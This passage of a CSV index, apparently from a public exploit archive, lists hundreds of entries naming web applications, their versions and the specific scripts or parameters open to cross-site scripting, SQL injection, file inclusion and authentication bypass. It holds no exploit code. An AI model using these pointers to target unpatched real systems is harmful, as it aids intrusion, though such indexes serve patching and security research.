Vulnerabilities",2006-03-28,r0t,php,webapps, -27504,exploits/php/webapps/27504.txt,"Connect Daily 3.2.8/3.2.9 - 'ViewYear.html' Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,r0t,php,webapps, -27505,exploits/php/webapps/27505.txt,"Connect Daily 3.2.8/3.2.9 - 'ViewCal.html?item_type_id' Cross-Site Scripting",2006-03-28,r0t,php,webapps, -27506,exploits/php/webapps/27506.txt,"Connect Daily 3.2.8/3.2.9 - 'ViewWeek.html?week' Cross-Site Scripting",2006-03-28,r0t,php,webapps, -27507,exploits/php/webapps/27507.txt,"AL-Caricatier 2.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,Linux_Drox,php,webapps, -27509,exploits/php/webapps/27509.txt,"OneOrZero 1.6.3 Helpdesk - 'index.php' SQL Injection",2006-03-28,Preddy,php,webapps, -27510,exploits/php/webapps/27510.txt,"PhxContacts 0.93 - 'carnet.php' Multiple SQL Injections",2006-03-29,"Morocco Security Team",php,webapps, -27511,exploits/php/webapps/27511.txt,"PhxContacts 0.93 - 'contact_view.php?id_contact' SQL Injection",2006-03-29,"Morocco Security Team",php,webapps, -27512,exploits/php/webapps/27512.txt,"PhxContacts 0.93 - 'login.php' Cross-Site Scripting",2006-03-29,DaBDouB-MoSiKaR,php,webapps, -27513,exploits/php/webapps/27513.txt,"VNews 1.2 - Multiple SQL Injections",2006-03-30,"Aliaksandr Hartsuyeu",php,webapps, -27514,exploits/php/webapps/27514.txt,"Tribq CMS 5.2.7 - Cross-Site Request Forgery (Adding/Editing New Administrator Account)",2013-08-12,"Yashar shahinzadeh",php,webapps, -27515,exploits/php/webapps/27515.txt,"Open Real Estate CMS 1.5.1 - Multiple Vulnerabilities",2013-08-12,"Yashar shahinzadeh",php,webapps, -27518,exploits/php/webapps/27518.txt,"MLMAuction Script - 'gallery.php?id' SQL Injection",2013-08-12,3spi0n,php,webapps, -27519,exploits/php/webapps/27519.txt,"PHPVID 1.2.3 - Multiple Vulnerabilities",2013-08-12,3spi0n,php,webapps, -27729,exploits/php/webapps/27729.txt,"Scry Gallery 1.1 - 'index.php' Cross-Site Scripting",2006-04-24,mayank,php,webapps, -27521,exploits/php/webapps/27521.txt,"Ajax PHP Penny Auction 1.x 2.x - Multiple Vulnerabilities",2013-08-12,"Taha Hunter",php,webapps,80 -27522,exploits/php/webapps/27522.txt,"Gnew 2013.1 - Multiple Vulnerabilities (1)",2013-08-12,LiquidWorm,php,webapps,80 -27533,exploits/php/webapps/27533.txt,"X-Changer 0.20 - Multiple SQL Injections",2006-03-30,"Morocco Security Team",php,webapps, -27728,exploits/cgi/webapps/27728.txt,"Blender 2.36 - '.BVF' File Import Python Code Execution",2006-04-24,"Joxean Koret",cgi,webapps, -27525,exploits/php/webapps/27525.txt,"Integrated CMS 1.0 - SQL Injection",2013-08-12,DSST,php,webapps,80 -27531,exploits/php/webapps/27531.txt,"WordPress Plugin Hms Testimonials 2.0.10 - Multiple Vulnerabilities",2013-08-12,RogueCoder,php,webapps, -27532,exploits/php/webapps/27532.txt,"Joomla! Component redSHOP 1.2 - SQL Injection",2013-08-12,"Matias Fontanini",php,webapps, -27534,exploits/php/webapps/27534.txt,"MediaSlash Gallery - 'index.php' Remote File Inclusion",2006-03-30,"Morocco Security Team",php,webapps, -27535,exploits/php/webapps/27535.txt,"O2PHP Oxygen 1.0/1.1 - 'post.php' SQL Injection",2006-03-30,"Morocco Security Team",php,webapps, -27536,exploits/asp/webapps/27536.txt,"SiteSearch Indexer 3.5 - 'searchresults.asp' Cross-Site Scripting",2006-03-31,r0t,asp,webapps, -27537,exploits/php/webapps/27537.txt,"Warcraft III Replay Parser for PHP 1.8.c - 'index.php' Remote File Inclusion",2006-03-31,botan,php,webapps, -27538,exploits/php/webapps/27538.txt,"RedCMS 0.1 - 'profile.php?u' SQL Injection",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps, -27539,exploits/php/webapps/27539.txt,"RedCMS 0.1 - 'login.php' Multiple SQL Injections",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps, -27540,exploits/php/webapps/27540.txt,"RedCMS 0.1 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps, -27544,exploits/php/webapps/27544.txt,"SoftBiz Image Gallery - 'suggest_image.php?cid' SQL Injection",2006-03-31,Linux_Drox,php,webapps, -27545,exploits/php/webapps/27545.txt,"SoftBiz Image Gallery - 'insert_rating.php?img_id' SQL Injection",2006-03-31,Linux_Drox,php,webapps, -27546,exploits/php/webapps/27546.txt,"SoftBiz Image Gallery - 'images.php?cid' SQL Injection",2006-03-31,Linux_Drox,php,webapps, -27548,exploits/php/webapps/27548.txt,"Claroline 1.x - 'rqmkhtml.php' Information Disclosure",2006-03-31,rgod,php,webapps, -27549,exploits/php/webapps/27549.txt,"Claroline 1.x - 'rqmkhtml.php' Cross-Site Scripting",2006-03-31,rgod,php,webapps, -27550,exploits/php/webapps/27550.txt,"Blank'N'Berg 0.2 - Directory Traversal",2006-03-31,"Amine ABOUD",php,webapps, -27551,exploits/php/webapps/27551.txt,"Blank'N'Berg 0.2 - Cross-Site Scripting",2006-03-31,"Amine ABOUD",php,webapps, -27552,exploits/asp/webapps/27552.txt,"ISP Site Man - 'admin_login.asp' SQL Injection",2006-04-01,s3rv3r_hack3r,asp,webapps, -27558,exploits/jsp/webapps/27558.txt,"Bugzero 4.3.1 - 'query.jsp?msg' Cross-Site Scripting",2006-04-03,r0t,jsp,webapps, -27559,exploits/jsp/webapps/27559.txt,"Bugzero 4.3.1 - 'edit.jsp' Multiple Cross-Site Scripting Vulnerabilities",2006-04-03,r0t,jsp,webapps, -27560,exploits/php/webapps/27560.txt,"aWebNews 1.2 - 'visview.php?_GET['cid']' SQL Injection",2006-04-03,"Aliaksandr Hartsuyeu",php,webapps, -27561,exploits/cgi/webapps/27561.txt,"Web-APP.net WebAPP 0.9.x - 'index.cgi' Multiple Cross-Site Scripting Vulnerabilities",2006-04-03,r0t,cgi,webapps, -27562,exploits/cgi/webapps/27562.txt,"Web-APP.net WebAPP 0.9.x - '/mods/calendar/index.cgi?vsSD' Cross-Site Scripting",2006-04-03,r0t,cgi,webapps, -27563,exploits/php/webapps/27563.txt,"LucidCMS 2.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-04-03,"Rusydi Hasan",php,webapps, -27567,exploits/php/webapps/27567.txt,"ArabPortal 2.0.1 - Multiple Input Validation Vulnerabilities",2006-04-04,o.y.6,php,webapps, -27570,exploits/php/webapps/27570.txt,"Chucky A. Ivey N.T. 1.1 - 'index.php' Multiple HTML Injection Vulnerabilities",2006-04-05,"Aliaksandr Hartsuyeu",php,webapps, -27571,exploits/php/webapps/27571.txt,"SKForum 1.x - 'area.View.action?areaID' Cross-Site Scripting",2006-04-06,r0t,php,webapps, -27572,exploits/php/webapps/27572.txt,"SKForum 1.x - 'planning.View.action?time' Cross-Site Scripting",2006-04-06,r0t,php,webapps, -27573,exploits/php/webapps/27573.txt,"SKForum 1.x - 'user.View.action?userID' Cross-Site Scripting",2006-04-06,r0t,php,webapps, -27574,exploits/php/webapps/27574.txt,"Basic Analysis and Security Engine (BASE) 1.2.4 - PrintFreshPage Cross-Site Scripting",2003-04-06,"Adam Ely",php,webapps, -27575,exploits/php/webapps/27575.txt,"MD News 1 - 'admin.php' SQL Injection",2006-04-06,"Aliaksandr Hartsuyeu",php,webapps, -27576,exploits/php/webapps/27576.txt,"MAXDEV CMS 1.0.72/1.0.73 - 'PNuserapi.php' SQL Injection",2006-04-06,king_purba,php,webapps, -27578,exploits/php/webapps/27578.txt,"Jupiter CMS 1.1.5 - 'index.php' Cross-Site Scripting",2006-04-07,KaDaL-X,php,webapps, -27579,exploits/php/webapps/27579.txt,"Bitweaver CMS 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-07,KaDaL-X,php,webapps, -27580,exploits/php/webapps/27580.txt,"vBulletin 3.5.1 - 'Vbugs.php' Cross-Site Scripting",2006-04-07,r0t,php,webapps, -27582,exploits/php/webapps/27582.txt,"AWeb's Banner Generator 3.0 - Cross-Site Scripting",2006-04-07,benozor77,php,webapps, -27583,exploits/cgi/webapps/27583.txt,"TalentSoft Web+ Shop 5.0 - 'Deptname' Cross-Site Scripting",2006-04-07,r0t,cgi,webapps, -27584,exploits/php/webapps/27584.txt,"JBook 1.3 - 'index.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps, -27585,exploits/php/webapps/27585.txt,"PHPMyForum 4.0 - 'page' Cross-Site Scripting",2006-04-10,Psych0,php,webapps, -27586,exploits/php/webapps/27586.txt,"PHPMyForum 4.0 - 'index.php?type' CRLF Injection",2006-04-10,Psych0,php,webapps, -27587,exploits/php/webapps/27587.txt,"PHPWebGallery 1.4.1 - 'category.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps, -27588,exploits/php/webapps/27588.txt,"PHPWebGallery 1.4.1 - 'picture.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps, -27589,exploits/php/webapps/27589.txt,"SPIP 1.8.3 - 'Spip_login.php' Remote File Inclusion",2006-04-10,cR45H3R,php,webapps, -27590,exploits/php/webapps/27590.txt,"APT-webshop 3.0/4.0 - 'modules.php' Multiple SQL Injections",2005-04-10,r0t,php,webapps, -27591,exploits/php/webapps/27591.txt,"Shadowed Portal 5.7 - 'Load.php' Cross-Site Scripting",2006-04-10,Liz0ziM,php,webapps, -27592,exploits/php/webapps/27592.txt,"SIRE 2.0 - Arbitrary File Upload",2006-04-10,simo64,php,webapps, -27593,exploits/php/webapps/27593.txt,"VegaDNS 0.9.9 - 'index.php?cid' SQL Injection",2006-04-10,Ph03n1X,php,webapps, -27594,exploits/cgi/webapps/27594.txt,"Matt Wright Guestbook 2.3.1 - Guestbook.pl Multiple HTML Injection Vulnerabilities",2006-04-07,Liz0ziM,cgi,webapps, -27597,exploits/php/webapps/27597.txt,"KCFinder 2.51 - Local File Disclosure",2013-08-15,DaOne,php,webapps, -27598,exploits/php/webapps/27598.txt,"Mac's CMS 1.1.4 - Multiple Vulnerabilities",2013-08-15,"Yashar shahinzadeh",php,webapps, -27600,exploits/php/webapps/27600.txt,"Pligg CMS 2.0.0rc2 - Cross-Site Request Forgery (File Creation)",2013-08-15,DaOne,php,webapps, -27601,exploits/php/webapps/27601.txt,"Spitfire CMS 1.1.4 - Cross-Site Request Forgery",2013-08-15,"Yashar shahinzadeh",php,webapps, -27602,exploits/php/webapps/27602.txt,"DotNetNuke DNNArticle Module 10.0 - SQL Injection",2013-08-15,"Sajjad Pourali",php,webapps, -27603,exploits/php/webapps/27603.txt,"w-CMS 2.0.1 - Remote Code Execution",2013-08-15,ICheer_No0M,php,webapps, -27605,exploits/php/webapps/27605.txt,"Alibaba Clone Tritanium Version - 'news_desc.html' SQL Injection",2013-08-15,IRAQ_JAGUAR,php,webapps, -27612,exploits/php/webapps/27612.txt,"ShopWeezle 2.0 - 'login.php?itemID' SQL Injection",2006-04-10,r0t,php,webapps, -27613,exploits/php/webapps/27613.txt,"ShopWeezle 2.0 - 'index.php' Multiple SQL Injections",2006-04-10,r0t,php,webapps, -27614,exploits/php/webapps/27614.txt,"ShopWeezle 2.0 - 'memo.php?itemID' SQL Injection",2006-04-10,r0t,php,webapps, -27615,exploits/php/webapps/27615.txt,"AzDGVote - Remote File Inclusion",2006-04-11,SnIpEr_SA,php,webapps, -27616,exploits/php/webapps/27616.txt,"JetPhoto 1.0/2.0/2.1 - 'thumbnail.php?page' Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps, -27617,exploits/php/webapps/27617.txt,"JetPhoto 1.0/2.0/2.1 - 'gallery.php?page' Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps, -27618,exploits/php/webapps/27618.txt,"JetPhoto 1.0/2.0/2.1 - 'Slideshow.php?name' Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps, -27619,exploits/php/webapps/27619.txt,"JetPhoto 1.0/2.0/2.1 - 'detail.php?page' Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps, -27620,exploits/cgi/webapps/27620.txt,"Microsoft FrontPage - Server Extensions Cross-Site Scripting",2006-04-11,"Esteban Martinez Fayo",cgi,webapps, -27621,exploits/php/webapps/27621.txt,"Clever Copy 3.0 - 'Connect.INC' Information Disclosure",2006-04-11,"M.Hasran Addahroni",php,webapps, -27622,exploits/php/webapps/27622.txt,"Dokeos 1.x - 'viewtopic.php' SQL Injection",2006-04-11,"Alvaro Olavarria",php,webapps, -27623,exploits/php/webapps/27623.txt,"SWSoft Confixx 3.1.2 - 'Jahr' Cross-Site Scripting",2006-04-11,Snake_23,php,webapps, -27624,exploits/php/webapps/27624.txt,"PHPKIT 1.6.1 R2 - 'Include.php' SQL Injection",2006-04-11,"Hamid Ebadi",php,webapps, -27625,exploits/php/webapps/27625.txt,"Indexu 5.0 - Multiple Remote File Inclusions",2006-04-11,SnIpEr_SA,php,webapps, -27626,exploits/php/webapps/27626.txt,"Tritanium Bulletin Board 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-11,d4igoro,php,webapps, -27628,exploits/php/webapps/27628.txt,"SWSoft Confixx 3.0.6/3.0.8/3.1.2 - 'index.php' SQL Injection",2006-04-11,LoK-Crew,php,webapps, -27629,exploits/php/webapps/27629.txt,"Chipmunk Guestbook 1.3 - 'index.php' SQL Injection",2006-04-12,Dr.Jr7,php,webapps, -27631,exploits/cgi/webapps/27631.txt,"Interaktiv.shop 4/5 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-12,r0t,cgi,webapps, -27632,exploits/php/webapps/27632.txt,"phpMyAdmin 2.7 - 'sql.php' Cross-Site Scripting",2005-10-31,p0w3r,php,webapps, -27638,exploits/php/webapps/27638.pl,"SimpleBBS 1.0.6/1.0.7/1.1 - Arbitrary Command Execution",2006-04-13,rUnViRuS,php,webapps, -27642,exploits/php/webapps/27642.txt,"AR-Blog 5.2 - 'print.php' Cross-Site Scripting",2006-04-14,ALMOKANN3,php,webapps, -27643,exploits/php/webapps/27643.php,"PHPAlbum 0.2.2/0.2.3/4.1 - 'Language.php' File Inclusion",2006-04-15,rgod,php,webapps, -27644,exploits/php/webapps/27644.txt,"PlanetSearch + - 'Planetsearchplus.php' Cross-Site Scripting",2006-04-13,d4igoro,php,webapps, -27645,exploits/php/webapps/27645.txt,"PowerClan 1.14 - 'member.php' SQL Injection",2006-04-13,d4igoro,php,webapps, -27646,exploits/php/webapps/27646.txt,"LifeType 1.0.3 - 'index.php' Cross-Site Scripting",2006-04-13,"Rusydi Hasan",php,webapps, -27647,exploits/php/webapps/27647.txt,"Papoo 2.1.x - 'print.php' Cross-Site Scripting",2006-04-14,"Rusydi Hasan",php,webapps, -27648,exploits/php/webapps/27648.txt,"MODx CMS 0.9.1 - 'index.php' Cross-Site Scripting",2006-04-14,"Rusydi Hasan",php,webapps, -27649,exploits/php/webapps/27649.txt,"MODx CMS 0.9.1 - 'index.php' Directory Traversal",2006-04-14,"Rusydi Hasan",php,webapps, -27650,exploits/php/webapps/27650.txt,"Farsinews 2.1/2.5 - 'search.php' Cross-Site Scripting",2006-04-14,"amin emami",php,webapps, -27651,exploits/php/webapps/27651.txt,"Tiny Web Gallery 1.4 - 'index.php' Cross-Site Scripting",2006-04-15,Qex,php,webapps, -27652,exploits/php/webapps/27652.txt,"Quack Chat 1.0 - Multiple Vulnerabilities",2013-08-17,"Dylan Irzi",php,webapps,80 -27970,exploits/php/webapps/27970.txt,"CyBoards PHP Lite 1.21/1.25 - 'Common.php' Remote File Inclusion",2006-06-05,SpC-x,php,webapps, -27655,exploits/ios/webapps/27655.txt,"Copy to WebDAV 1.1 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,ios,webapps, -27656,exploits/ios/webapps/27656.txt,"Photo Transfer Upload 1.0 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,ios,webapps, -27658,exploits/php/webapps/27658.txt,"PHPGuestbook 0.0.2/1.0 - HTML Injection",2006-04-15,Qex,php,webapps, -27659,exploits/php/webapps/27659.txt,"PHPFaber TopSites - 'index.php' Cross-Site Scripting",2006-04-17,botan,php,webapps, -27660,exploits/php/webapps/27660.txt,"Monster Top List 1.4 - 'functions.php' Remote File Inclusion",2006-04-17,r0t,php,webapps, -27661,exploits/php/webapps/27661.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (1)",2006-04-17,Hessam-x,php,webapps, -27662,exploits/php/webapps/27662.txt,"Blursoft Blur6ex 0.3.462 - 'index.php' Local File Inclusion",2006-04-17,"Hamid Ebadi",php,webapps, -27663,exploits/php/webapps/27663.txt,"DbbS 2.0 - Multiple Input Validation Vulnerabilities",2006-04-17,rgod,php,webapps, -27664,exploits/php/webapps/27664.txt,"Jax Guestbook 3.50 - 'Page' Cross-Site Scripting",2006-04-17,ALMOKANN3,php,webapps, -27665,exploits/php/webapps/27665.txt,"Calendarix 0.7 - 'YearCal.php' Cross-Site Scripting",2006-04-17,botan,php,webapps, -27666,exploits/php/webapps/27666.txt,"Manila 9.0.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-17,"Aaron Kaplan",php,webapps, -27667,exploits/php/webapps/27667.txt,"MyBB 1.1 - Global Variable Overwrite",2006-04-17,imei,php,webapps, -27669,exploits/php/webapps/27669.txt,"Coppermine 1.4.4 - 'index.php' Local File Inclusion",2006-04-17,imei,php,webapps, -27672,exploits/cgi/webapps/27672.txt,"axoverzicht.CGI - Cross-Site Scripting",2006-04-18,Qex,cgi,webapps, -27673,exploits/php/webapps/27673.txt,"PHPLinks 2.1.2/2.1.3 - 'index.php' Cross-Site Scripting",2006-04-18,r0t,php,webapps, -27674,exploits/php/webapps/27674.txt,"RechnungsZentrale 2 1.1.3 - 'Authent.php4' SQL Injection",2006-04-18,"GroundZero Security",php,webapps, -27675,exploits/php/webapps/27675.txt,"PHPLister 0.4.1 - 'index.php' Cross-Site Scripting",2006-04-18,botan,php,webapps, -27676,exploits/php/webapps/27676.txt,"CutePHP CuteNews 1.4.1 Editnews Module - Cross-Site Scripting",2006-04-19,LoK-Crew,php,webapps, -27677,exploits/php/webapps/27677.txt,"Article Publisher 1.0.1 Pro - Multiple SQL Injections",2006-04-19,r0t,php,webapps, -27678,exploits/php/webapps/27678.txt,"ModernBill 4.3 - 'user.php' SQL Injection",2006-04-19,r0t,php,webapps, -27679,exploits/cgi/webapps/27679.txt,"Visale 1.0 - 'pbpgst.cgi?keyval' Cross-Site Scripting",2006-04-19,r0t,cgi,webapps, -27680,exploits/cgi/webapps/27680.txt,"Visale 1.0 - 'pblscg.cgi?catsubno' Cross-Site Scripting",2006-04-19,r0t,cgi,webapps, -27681,exploits/cgi/webapps/27681.txt,"Visale 1.0 - 'pblsmb.cgi?listno' Cross-Site Scripting",2006-04-19,r0t,cgi,webapps, -27682,exploits/cgi/webapps/27682.txt,"CommuniMail 1.2 - 'mailadmin.cgi?list_id' Cross-Site Scripting",2006-04-19,r0t,cgi,webapps, -27683,exploits/cgi/webapps/27683.txt,"CommuniMail 1.2 - 'templates.cgi?form_id' Cross-Site Scripting",2006-04-19,r0t,cgi,webapps, -27684,exploits/jsp/webapps/27684.txt,"Cisco Wireless Lan Solution Engine - ArchiveApplyDisplay.jsp Cross-Site Scripting",2006-04-19,"Adam Pointon",jsp,webapps, -27685,exploits/cgi/webapps/27685.txt,"IntelliLink Pro 5.06 - 'addlink_lwp.cgi?url' Cross-Site Scripting",2006-04-19,r0t,cgi,webapps, -27686,exploits/cgi/webapps/27686.txt,"IntelliLink Pro 5.06 - 'edit.cgi' Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps, -27687,exploits/php/webapps/27687.txt,"ThWboard 2.8 - 'showtopic.php' SQL Injection",2006-04-19,Qex,php,webapps, -27688,exploits/php/webapps/27688.txt,"ContentBoxx - 'login.php' Cross-Site Scripting",2006-04-19,botan,php,webapps, -27689,exploits/cgi/webapps/27689.txt,"BannerFarm 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps, -27690,exploits/cgi/webapps/27690.txt,"xFlow 5.46.11 - 'index.cgi' Multiple SQL Injections",2006-04-19,r0t,cgi,webapps, -27691,exploits/cgi/webapps/27691.txt,"xFlow 5.46.11 - 'index.cgi' Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps, -27692,exploits/php/webapps/27692.txt,"Plexum PlexCart X5 - Multiple SQL Injections",2006-04-19,r0t,php,webapps, -27693,exploits/php/webapps/27693.txt,"otalCalendar - 'about.php?inc_dir' Remote File Inclusion",2006-04-19,VietMafia,php,webapps, -27694,exploits/cgi/webapps/27694.txt,"AWStats 4.0/5.x/6.x - AWStats.pl Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps, -27695,exploits/cgi/webapps/27695.txt,"Net Clubs Pro 4.0 - 'sendim.cgi' Multiple Cross-Site Scripting Vulnerabilities",2006-04-20,r0t,cgi,webapps, -27696,exploits/cgi/webapps/27696.txt,"Net Clubs Pro 4.0 - 'imessage.cgi?Username' Cross-Site Scripting",2006-04-20,r0t,cgi,webapps, -27697,exploits/cgi/webapps/27697.txt,"Net Clubs Pro 4.0 - 'login.cgi?Password' Cross-Site Scripting",2006-04-20,r0t,cgi,webapps, -28055,exploits/hardware/webapps/28055.txt,"TP-Link TD-W8951ND - Multiple Vulnerabilities",2013-09-03,xistence,hardware,webapps, -28057,exploits/php/webapps/28057.txt,"Cline Communications - Multiple SQL Injections",2006-06-17,Liz0ziM,php,webapps, -28058,exploits/php/webapps/28058.txt,"Eduha Meeting - 'index.php' Arbitrary File Upload",2006-06-19,Liz0ziM,php,webapps, -28061,exploits/asp/webapps/28061.txt,"Cisco CallManager 3.x/4.x - 'Web Interface 'ccmadmin/phonelist.asp?Pattern' Cross-Site Scripting",2006-06-19,"Jake Reynolds",asp,webapps, -28062,exploits/asp/webapps/28062.txt,"Cisco CallManager 3.x/4.x - 'Web Interface 'ccmuser/logon.asp' Cross-Site Scripting",2006-06-19,"Jake Reynolds",asp,webapps, -28700,exploits/php/webapps/28700.txt,"CubeCart 3.0.x - 'view_order.php?order_id' Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps, -28053,exploits/hardware/webapps/28053.txt,"Zoom Telephonics ADSL Modem/Router - Multiple Vulnerabilities",2013-09-03,"Kyle Lovett",hardware,webapps, -28054,exploits/php/webapps/28054.txt,"WordPress Plugin IndiaNIC Testimonial - Multiple Vulnerabilities",2013-09-03,RogueCoder,php,webapps, -27707,exploits/php/webapps/27707.txt,"I-RATER Platinum - 'Common.php' Remote File Inclusion",2006-04-20,r0t,php,webapps, -27709,exploits/php/webapps/27709.txt,"4homepages 4Images 1.7 - 'member.php' Cross-Site Scripting",2006-04-20,Qex,php,webapps, -27710,exploits/php/webapps/27710.txt,"W2B Online Banking - 'SID' Cross-Site Scripting",2006-04-20,r0t,php,webapps, -27975,exploits/php/webapps/27975.txt,"Bookmark4U 2.0 - '/inc/common.php?env[include_prefix]' Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps, -27976,exploits/php/webapps/27976.txt,"Bookmark4U 2.0 - '/inc/function.php?env[include_prefix]' Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps, -27977,exploits/php/webapps/27977.txt,"Kmita FAQ 1.0 - 'search.php?q' Cross-Site Scripting",2006-06-05,Luny,php,webapps, -27978,exploits/php/webapps/27978.txt,"Kmita FAQ 1.0 - 'index.php?catid' SQL Injection",2006-06-05,Luny,php,webapps, -28694,exploits/php/webapps/28694.txt,"vBulletin 2.3.x - 'global.php' SQL Injection",2006-09-26,"HACKERS PAL",php,webapps, -27711,exploits/php/webapps/27711.txt,"ThWboard 3.0 - 'index.php' Cross-Site Scripting",2006-04-20,"CrAzY CrAcKeR",php,webapps, -27712,exploits/cgi/webapps/27712.txt,"Portal Pack 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-20,r0t,cgi,webapps, -27713,exploits/php/webapps/27713.txt,"Manic Web MWGuest 2.1 - 'MWguest.php' HTML Injection",2006-04-20,"Aliaksandr Hartsuyeu",php,webapps, -27717,exploits/php/webapps/27717.txt,"phpLDAPadmin 0.9.8 - 'compare_form.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps, -27718,exploits/php/webapps/27718.txt,"phpLDAPadmin 0.9.8 - 'copy_form.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps, -27719,exploits/php/webapps/27719.txt,"phpLDAPadmin 0.9.8 - 'rename_form.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps, -33404,exploits/php/webapps/33404.txt,"phpFaber CMS 1.3.36 - 'module.php' Cross-Site Scripting",2009-12-14,bi0,php,webapps, -27721,exploits/php/webapps/27721.txt,"phpLDAPadmin 0.9.8 - 'search.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps, -27722,exploits/php/webapps/27722.txt,"phpLDAPadmin 0.9.8 - 'template_engine.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps, -27724,exploits/php/webapps/27724.txt,"Scry Gallery - Directory Traversal",2006-04-21,"Morocco Security Team",php,webapps, -27725,exploits/php/webapps/27725.txt,"MKPortal 1.1 - Multiple Input Validation Vulnerabilities",2006-04-22,"Mustafa Can Bjorn IPEKCI",php,webapps, -27726,exploits/php/webapps/27726.txt,"Simplog 0.9.3 - 'ImageList.php' Cross-Site Scripting",2006-04-22,nukedx,php,webapps, -27731,exploits/php/webapps/27731.txt,"PhotoKorn 1.53/1.54 - 'index.php' Multiple SQL Injections",2006-04-25,Dr.Jr7,php,webapps, -27732,exploits/php/webapps/27732.txt,"PhotoKorn 1.53/1.54 - 'id' SQL Injection",2006-04-25,Dr.Jr7,php,webapps, -27733,exploits/php/webapps/27733.txt,"PhotoKorn 1.53/1.54 - 'print.php?cat' SQL Injection",2006-04-25,Dr.Jr7,php,webapps, -27734,exploits/php/webapps/27734.txt,"NextAge Shopping Cart - Multiple HTML Injection Vulnerabilities",2006-04-25,R@1D3N,php,webapps, -27735,exploits/php/webapps/27735.txt,"PHPWebFTP 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-25,arko.dhar,php,webapps, -27736,exploits/php/webapps/27736.txt,"Invision Power Board 2.0/2.1 - 'index.php?CK' SQL Injection",2006-05-25,IceShaman,php,webapps, -27737,exploits/php/webapps/27737.txt,"Instant Photo Gallery 1.0 - 'member.php?member' Cross-Site Scripting",2006-04-25,Qex,php,webapps, -27738,exploits/php/webapps/27738.txt,"Instant Photo Gallery 1.0 - 'portfolio.php?cat_id' Cross-Site Scripting",2006-04-25,Qex,php,webapps, -27739,exploits/php/webapps/27739.txt,"Instant Photo Gallery 1.0 - 'portfolio_photo_popup.php?id' Cross-Site Scripting",2006-04-25,Qex,php,webapps, -27740,exploits/php/webapps/27740.txt,"CuteNews 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-26,outlaw.dll,php,webapps, -27741,exploits/php/webapps/27741.txt,"Farsinews 2.5.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-26,O.U.T.L.A.W.,php,webapps, -27742,exploits/php/webapps/27742.txt,"DevBB 1.0 - 'member.php' Cross-Site Scripting",2006-04-26,Qex,php,webapps, -27743,exploits/php/webapps/27743.txt,"MySmartBB 1.1.2/1.1.3 - Multiple Input Validation Vulnerabilities",2006-04-04,BoNy-m,php,webapps, -27750,exploits/php/webapps/27750.py,"Bitbot (C2 Web Panel) - 'gate2.php' Multiple Vulnerabilities",2013-08-21,bwall,php,webapps, -27751,exploits/php/webapps/27751.txt,"WordPress Plugin ThinkIT 0.1 - Multiple Vulnerabilities",2013-08-21,"Yashar shahinzadeh",php,webapps, -27753,exploits/hardware/webapps/27753.txt,"Samsung DVR Firmware 1.10 - Authentication Bypass",2013-08-21,"Andrea Fabrizi",hardware,webapps,80 -27755,exploits/windows/webapps/27755.txt,"Adobe ColdFusion 9 - Administrative Authentication Bypass",2013-08-21,"Scott Buckel",windows,webapps, -27756,exploits/hardware/webapps/27756.txt,"Sitecom N300/N600 Devices - Multiple Vulnerabilities",2013-08-21,"Roberto Paleari",hardware,webapps, -27757,exploits/asp/webapps/27757.txt,"DUclassified - 'detail.asp' SQL Injection",2006-04-28,sadegh.sarshogh,asp,webapps, -27761,exploits/cgi/webapps/27761.txt,"NeoMail - 'NeoMail.pl?sessionid' Cross-Site Scripting",2006-04-28,O.U.T.L.A.W,cgi,webapps, -27763,exploits/php/webapps/27763.php,"I-RATER Platinum - 'Config_settings.TPL.php' Remote File Inclusion",2006-04-28,O.U.T.L.A.W,php,webapps, -27767,exploits/php/webapps/27767.txt,"Artmedic Event - 'index.php' Remote File Inclusion",2006-04-28,botan,php,webapps, -27768,exploits/php/webapps/27768.php,"CoolMenus 4.0 - 'index.php' Remote File Inclusion",2006-04-28,botan,php,webapps, -27770,exploits/php/webapps/27770.txt,"Blog 0.2.3/0.2.4 Mod - 'Weblog_posting.php' SQL Injection",2006-04-29,Qex,php,webapps, -27771,exploits/php/webapps/27771.txt,"Ovidentia 7.9.4 - Multiple Vulnerabilities",2013-08-22,LiquidWorm,php,webapps,80 -27855,exploits/php/webapps/27855.txt,"Vizra - 'A_Login.php' Cross-Site Scripting",2006-05-11,R00TT3R,php,webapps, -27857,exploits/php/webapps/27857.txt,"phpBB Chart Mod 1.1 - 'charts.php?id' SQL Injection",2006-05-11,sn4k3.23,php,webapps, -27773,exploits/php/webapps/27773.txt,"CBHotel Hotel Software and Booking system 1.8 - Multiple Vulnerabilities",2013-08-22,"Dylan 